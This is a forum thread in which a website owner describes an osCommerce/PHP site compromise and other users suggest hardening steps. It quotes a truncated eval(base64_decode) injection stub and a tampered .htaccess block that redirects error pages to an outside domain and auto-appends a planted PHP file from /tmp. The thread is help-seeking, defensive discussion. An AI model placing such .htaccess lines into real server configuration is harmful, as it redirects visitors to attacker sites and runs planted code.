BleepingComputer.com: website security guidance

Hello Guys,

How are you?

I have a website which is hosted by Hostgator. My website consists of php pages, oscommerce system and mysql databases. My site receives low-moderate traffic I guess.

Now a month ago there was some php injection or some attack. All the php files in my website were infected by some code which appeared on top of the php scripts. It was <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC...

I had to edit all php files and remove that code from there.

Now recently my site stopped opening. I got error Internal Server Error. After some research I figured that the .htaccess file has been tampered with. The following lines were appearing in each .htaccess file.

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 406 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 408 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 500 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 501 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 502 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 503 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 504 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 505 http://arthurlundt.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061108586234.php"

So I had to remove the files from their respective folders. I dont know why is this happening. What I know is that the oscommerce installation on the site is outdated. That could be one reason.

But otherwise what can I do to protect myself. I will tell the guys who developed my site to at least update the oscommerce installation.

I would be glad if anyone can help me.

Thanks a lot,

Cheers,
GR

From what I've read, OsCommerce is a terribly vulnerable platform to be using. The most common suggestions I've been seeing are to rename and password protect the /admin directory.

Though, given what I've just read, I would also suggest that perhaps ditching OsCommerce all together might be called for.

There are many steps you can take to secure an osCommerce site.

You can replace the $PHP_SELF lines in the application_top.php files (2 of them).

You can, as someone has already suggested, rename the admin folder (security by obscurity)

You can, disable the file_manager.php and define_language.php files. (they are two of the most attacked files on osCommerce)

You can use a variety of methods to prevent the double .php attack

You can use a strong .htaccess file (if you're not on Windows)

These steps go a long way in preventing osCommerce breaches.

Thanks a lot for your input guys.

I was talking to the guy who developed my website. He said that a lot of custom coding has been done by us and we have used bare minimum of oscommerce framework.

He says the problems are a result of your website site hoster's weak security. In other words according to him websites hosted by Hostgator are prone to malware attacks or security breaches because their security is weak.

What should I do? Should I leave hostgator.